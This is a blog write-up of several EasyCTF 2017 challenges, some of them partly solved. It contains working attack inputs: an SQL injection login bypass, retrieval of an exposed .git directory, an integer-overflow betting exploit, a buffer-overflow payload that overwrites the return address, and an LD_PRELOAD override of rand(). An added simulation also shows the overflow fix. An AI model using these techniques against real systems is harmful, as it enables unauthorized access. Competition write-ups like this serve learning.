jtwp470’s blog

Diary, programming and such

EasyCTF 2017 Writeup

Hi, I am @jtwp470. I took part in EasyCTF 2017. This article is my write-up for the CTF.

Our team earned 2985 pts, of which I scored 1080 pts.

https://www.easyctf.com/

[Web 100] SQL Injection 1

Easy SQLi. Enter admin';-- in the login form: the quote closes the username literal and -- comments out the rest of the query, so the password check never runs.

Flag: easyctf{a_prepared_statement_a_day_keeps_the_d0ctor_away!}

[Web 100] Edge 1

This problem requires a little guessing.

When you access http://edge1.web.easyctf.com/.git/, you can see the site's internal git directory. I then downloaded the exposed .git repository.

Flag: easyctf{w3_ev3n_u53_git}

[Web 200] Edge 2

This problem is very similar to Edge 1.

Flag: easyctf{hiding_the_problem_doesn't_mean_it's_gone!}

[Web 260] Web Tunnel

If you scan the first QR code, you get bl9BimiQOpw99yAYFbbD. I guessed that this is the file name of the next QR image.

Since following the chain by hand is tedious, I wrote a script.

#!/usr/bin/env python3
import subprocess
import os
import requests

URL = "http://tunnel.web.easyctf.com/images/{}"
FIRST_IMAGE = "DaicO7460493nYSuvLPW.png"
IMAGE_DIR = "image"


def read_qr(image=FIRST_IMAGE):
    # Decode the QR code with zbarimg; with -q it prints only "QR-Code:<data>"
    p = subprocess.Popen(
        ['zbarimg', '-q', os.path.join(IMAGE_DIR, image)],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=False,
    )
    stdout, stderr = p.communicate()

    if p.returncode != 0 or len(stderr) != 0:
        raise RuntimeError('zbarimg failed: {}'.format(stderr.decode('utf-8', 'replace')))
    # Keep everything after the first colon in case the data itself contains one
    return stdout.decode('utf-8').split(":", 1)[1].strip()


def save_qr(image=FIRST_IMAGE):
    print("Downloading... {}".format(image))
    r = requests.get(URL.format(image), stream=True)
    if r.status_code != 200:
        raise RuntimeError('HTTP {} for {}'.format(r.status_code, image))
    with open(os.path.join(IMAGE_DIR, image), 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)


if __name__ == "__main__":
    os.makedirs(IMAGE_DIR, exist_ok=True)
    image = FIRST_IMAGE
    while True:
        save_qr(image)
        data = read_qr(image)
        if data.startswith("easyctf{"):  # the last QR code holds the flag
            print(data)
            break
        image = "{}.png".format(data)

Flag: easyctf{y0u_sh0uld_b3_t1r3d_tr4v3ll1ng_all_th1s_w4y!!!!!}

[Binary Exploitation 100] Risky Business

This is a casino game with a signed integer overflow bug: losing a bet larger than your balance drives the net worth negative, and the balance wraps around. I understood that you need to earn 2 billion dollars to get the flag.

$ python -c 'print("99999999\n" * 10000)' | ./casino
Welcome to the EasyCTF 2017 Casino
Try your luck and gain access to our exclusive club!

Your net worth is: $100000
Please enter how much you would like to bet:
Sorry, I'm afraid you've lost :(

Your net worth is: $-99899999
…

Your net worth is: $2095067318
Welcome to our exclusive club!
Here's our special flag: easyctf{m4by3_w3_c0u1d_h4v3_d0n3_th47_b3t7er}
Traceback (most recent call last):
  File "<string>", line 1, in <module>
IOError: [Errno 32] Broken pipe
user42884@easyctf:/problems/casino$

Flag: easyctf{m4by3_w3_c0u1d_h4v3_d0n3_th47_b3t7er}
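As an added example (the casino's source is not on the page, so this is a constructed simulation, not the challenge's code), the net worth is modelled as a 32-bit signed integer: assuming every bet loses, 22 consecutive losing bets of 99999999 reproduce both balances shown in the transcript above, and a checked version beside it shows the bet validation that prevents the wrap.

```python
# Constructed simulation; the real casino's source is not on the page.
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1
START = 100000     # starting net worth shown in the transcript
BET = 99999999     # the bet the write-up pipes in


def wrap_int32(value):
    """Reduce a Python int to what a 32-bit two's complement int would hold."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def lose_bets_unchecked(net_worth, bet, losses):
    """Vulnerable arithmetic: subtract each lost bet like a C int, letting the
    balance go negative and eventually wrap back to a large positive value."""
    for _ in range(losses):
        net_worth = wrap_int32(net_worth - bet)
    return net_worth


def losses_until_positive(net_worth, bet, limit=1000):
    """How many consecutive losses until the wrapped balance is positive again."""
    for n in range(1, limit + 1):
        net_worth = wrap_int32(net_worth - bet)
        if net_worth > 0:
            return n, net_worth
    return None


def place_bet_checked(net_worth, bet):
    """Hardened version: a bet must be positive and no larger than the balance,
    so a loss can never take the balance below zero, and the result is
    range-checked before it would be stored in a 32-bit field."""
    if bet <= 0 or bet > net_worth:
        raise ValueError("bet must be between 1 and your current net worth")
    result = net_worth - bet
    if not INT32_MIN <= result <= INT32_MAX:
        raise OverflowError("balance would leave the 32-bit range")
    return result


if __name__ == "__main__":
    print(lose_bets_unchecked(START, BET, 1))   # -99899999, as in the transcript
    print(losses_until_positive(START, BET))    # (22, 2095067318)
```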

[Binary Exploitation 120] Simple Rop

There was a simple stack overflow bug, so I overwrote EIP and got the flag.

$ python -c "print('A' * 76 + '\x1a\x85\x04\x08')" | ./simple-rop

Flag: easyctf{r0p_7o_v1ct0ry}

[Reverse Engineering 200] Lucky Guess

You have to guess a number generated by the rand function.

I used LD_PRELOAD to override rand.

//  cc -o inject.so inject.c -shared -fPIC
//  When loaded with LD_PRELOAD, this definition takes precedence over libc's rand()
int rand(void) {
  return 1;
}

This rand function always returns 1.

So I injected it and answered 1:

$ echo 1 | LD_PRELOAD=./inject.so ./guess
Guess? easyctf{aaA_tOucH_0f_luccK_47ca4e}

Flag: easyctf{aaA_tOucH_0f_luccK_47ca4e}

This CTF was a lot of fun. Other write-ups: https://writeups.easyctf.com/